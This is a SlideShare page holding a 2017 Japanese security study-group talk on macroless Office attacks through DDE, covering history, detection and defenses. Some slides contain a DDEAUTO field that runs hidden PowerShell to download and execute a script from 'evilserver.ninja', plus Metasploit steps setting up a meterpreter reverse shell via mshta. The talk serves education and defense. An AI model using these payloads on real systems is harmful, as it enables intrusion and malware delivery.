Submit Search
Upload
DDEを悪用する Macroless Office Document Exploits
•
1 like
•
2,109 views
I
Isaac Mathis
Follow
DDEを悪用するマクロ不要のオフィスドキュメント攻撃について
Read less
Read more
Technology
Report
Share
Report
Share
1 of 28
Download now
Download to read offline
Recommended
THK_ITS #5 2010.11.13
THK_ITS #5 2010.11.13
Yukio NAGAO
Mob security キャリアアドバイスとライフハック
Mob security キャリアアドバイスとライフハック
Isaac Mathis
2019 12-14 DIY WIDS IoTSecJP Version 6.0
2019 12-14 DIY WIDS IoTSecJP Version 6.0
Isaac Mathis
近年急増のサイバー攻撃の傾向(2018/5)
近年急増のサイバー攻撃の傾向(2018/5)
Isaac Mathis
PWNの超入門 大和セキュリティ神戸 2018-03-25
PWNの超入門 大和セキュリティ神戸 2018-03-25
Isaac Mathis
“Stay Right”ペンテスト体験:SANS Holiday Hack Challenge 2017の解説 & Walkthrough
“Stay Right”ペンテスト体験:SANS Holiday Hack Challenge 2017の解説 & Walkthrough
Isaac Mathis
Meltdown/Spectreの脆弱性、リスク、対策
Meltdown/Spectreの脆弱性、リスク、対策
Isaac Mathis
SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)
Isaac Mathis
Recommended
THK_ITS #5 2010.11.13
THK_ITS #5 2010.11.13
Yukio NAGAO
Mob security キャリアアドバイスとライフハック
Mob security キャリアアドバイスとライフハック
Isaac Mathis
2019 12-14 DIY WIDS IoTSecJP Version 6.0
2019 12-14 DIY WIDS IoTSecJP Version 6.0
Isaac Mathis
近年急増のサイバー攻撃の傾向(2018/5)
近年急増のサイバー攻撃の傾向(2018/5)
Isaac Mathis
PWNの超入門 大和セキュリティ神戸 2018-03-25
PWNの超入門 大和セキュリティ神戸 2018-03-25
Isaac Mathis
“Stay Right”ペンテスト体験:SANS Holiday Hack Challenge 2017の解説 & Walkthrough
“Stay Right”ペンテスト体験:SANS Holiday Hack Challenge 2017の解説 & Walkthrough
Isaac Mathis
Meltdown/Spectreの脆弱性、リスク、対策
Meltdown/Spectreの脆弱性、リスク、対策
Isaac Mathis
SANS Holiday Hack 2017 (非公式ガイド)
SANS Holiday Hack 2017 (非公式ガイド)
Isaac Mathis
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NTT DATA Technology & Innovation
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
博三 太田
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
akihisamiyanaga1
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
FumieNakayama
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
UEHARA, Tetsutaro
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
Yuki Kikuchi
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
FumieNakayama
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
Hiroshi Tomioka
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Marius Sescu
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Expeed Software
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
Pixeldarts
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
marketingartwork
Skeleton Culture Code
Skeleton Culture Code
Skeleton Technologies
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
Neil Kimberley
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
contently
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
Albert Qian
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
Clark Boyd
Getting into the tech field. what next
Getting into the tech field. what next
Tessa Mero
More Related Content
Recently uploaded
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NTT DATA Technology & Innovation
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
博三 太田
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
akihisamiyanaga1
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
FumieNakayama
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
UEHARA, Tetsutaro
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
Yuki Kikuchi
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
FumieNakayama
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
Hiroshi Tomioka
Recently uploaded
(8)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
NewSQLの可用性構成パターン(OCHaCafe Season 8 #4 発表資料)
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
業務で生成AIを活用したい人のための生成AI入門講座(社外公開版:キンドリルジャパン社内勉強会:2024年4月発表)
Featured
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Marius Sescu
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Expeed Software
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
Pixeldarts
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
marketingartwork
Skeleton Culture Code
Skeleton Culture Code
Skeleton Technologies
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
Neil Kimberley
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
contently
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
Albert Qian
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
Clark Boyd
Getting into the tech field. what next
Getting into the tech field. what next
Tessa Mero
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Lily Ray
How to have difficult conversations
How to have difficult conversations
Rajiv Jayarajah, MAppComm, ACC
Introduction to Data Science
Introduction to Data Science
Christy Abraham Joy
Time Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
Vit Horky
The six step guide to practical project management
The six step guide to practical project management
MindGenius
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
RachelPearson36
Featured
(20)
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
Skeleton Culture Code
Skeleton Culture Code
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
Getting into the tech field. what next
Getting into the tech field. what next
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
How to have difficult conversations
How to have difficult conversations
Introduction to Data Science
Introduction to Data Science
Time Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
The six step guide to practical project management
The six step guide to practical project management
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
DDEを悪用する Macroless Office Document Exploits
1.
DDEを悪⽤する Macroless Office Document Exploits ⼤和セキュリティ勉強会 2017/12/23 ⽥中ザック
2.
DDEとは? •“Dynamic Data Exchange” •1987年からあるIPC⼿法の1つ
(Win 2.0+、OS/2) •例:3rdパーティソフトが.xlsデータにアクセス •OLEがDDEに取って代わる •互換性のために残されている(T_T) •ターゲット→MS Officeドキュメント、その他?: Word, Excel, Powerpoint, Access, Outlook, OneNote
3.
Macro不要のOffice攻撃 •マクロを悪用する攻撃は昔からある •メリット:最新版でも脆弱、多くのAVに検知されない 例:Macro/OLE/.HTAによるEmpire感染(悪用禁⽌!) https://enigma0x3.net/2016/03/15/phishing-with-empire/ •デメリット:⼈を騙す必要がある •最近マクロに敏感になっている⼈が増えてきたので、 メモリ破損不要かつマクロ不要の攻撃が注目されている
4.
Macro不要のOffice攻撃 •2016/05/20 Sensepost :
DDE経由で.xlsからコマンド実⾏ https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/ •2017/10/09 Sensepost : DDE経由で.docからコマンド実⾏ https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
5.
Macro不要のOffice攻撃 挿⼊ → クイックパーツ → フィールド
6.
Macro不要のOffice攻撃
7.
Macro不要のOffice攻撃 • 「!式の終わりが正しくありません。」を 右クリック フィールドコードの表示/非表示をクリック • {DDEAUTO
c:windowssystem32 cmd.exe "/k calc.exe" } を⼊⼒して保存
8.
Macro不要のOffice攻撃
9.
Macro不要のOffice攻撃 (実⾏後に表示↓)
10.
Macro不要のOffice攻撃 { DDEAUTO c:WindowsSystem32cmd.exe
"/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient). DownloadString('http://evilserver.ninja/pp.ps1'); powershell -e $e "}
11.
12.
Macro不要のOffice攻撃 Sensepostはマイクロソフトに Responsible Disclosureしたが、 「これは脆弱性ではなく、仕様です」って ⾔われたから詳細をブログにアップ
13.
Hancitor/Necursボットネット・Locky ランサムウェア •⼀週間以内にRansomwareが悪用しているという報告 https://www.vmray.com/blog/dde-ransomware-macroless-word-doc-analysis/
14.
巧妙な騙し⽅
15.
Outlookも脆弱 •Calender Invite、RTFメール等でOutlookもターゲット •※添付ファイルが無いため、AVが検知・防御できない
16.
対策
17.
対策 •MacかLinuxを利用
18.
対策 •メール訓練でユーザ教育 (Selphishとか?) https://www.selphish.jp/ •※100%ではないので、技術的な対策も必要
19.
検知 •YARAルール https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ ※回避されるかも •Windowsイベントログの記録されるかも? •起動プロセスを記録 https://www.securityforrealpeople.com/2017/10/exploiting-office-native-functionality.html
20.
防御 (Word) •「⽂書を開いたときにリンクを自動的に更新する」 のチェックを外す
21.
防御 (Office*) •DDEAutoを無効にする(レジストリを弄る) •https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b •注意:Excelがおかしくなる! •よくテストする必要がある!
22.
防御 (Office*) •第三者の「micropatch」を適用? •ソフトが壊れる可能性があるし、 サポートされていないのでおすすめしない •https://0patch.blogspot.jp/2017/10/0patching-office-dde-ddeauto.html
23.
防御 (Office*) •Attack Surface
Reduction (ASR)を利用(おすすめ!) ※Windows 10のWindows Defender Exploit Guard、EMET5+ https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/windows-defender-exploit-guard •Email/Webmailの実⾏ファイルをブロック •オフィスアプリは⼦プロセスを起動できない (今回のOutlook攻撃等は防げない) •オフィスアプリは実⾏ファイルを作成できない •オフィスアプリは別プロセスにコードインジェクションできない •JSとVBScriptから実⾏ファイルをダウンロードできない •難読化されたスクリプトを実⾏できない •オフィスマクロからWin32 APIを呼び出せない
24.
MetasploitでDDE攻撃 •wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/ fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb •mv dde_delivery.rb
/usr/share/metasploit-framework/modules/exploits/windows/ •msfconsole •use exploit/windows/dde_delivery •set SRVHOST 192.168.177.141 •set PAYLOAD windows/meterpreter/reverse_tcp •set LHOST 192.168.177.141 •set LPORT 6708 •exploit •{DDEAUTO C:ProgramsMicrosoftOfficeMSword.exe........windows system32mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}を.docに⼊れて送る •リンク:https://gbhackers.com/exploiting-windows-dde-exploit/ (悪用禁⽌!)
25.
幸いなこと∼ (ペンテスターにとっては残念なこと?)
26.
「マイクロソフトがWordのDDE機能を デフォルトで無効に。 月例パッチで自動適用」 http://nanashi0x.hatenablog.com/entry/2017/12/16/200000 @0x31_noseをチェック(Linux⼊門とかもある) ExcelもいつかMSのパッチでデフォルトで 無効になる?
27.
結論 ⼀時流⾏っていた フィッシング攻撃? マクロを有効にすると 同じようなハードルがあるので微妙 念のため無効にした⽅が安全
28.
ご清聴有難う御座います
Download now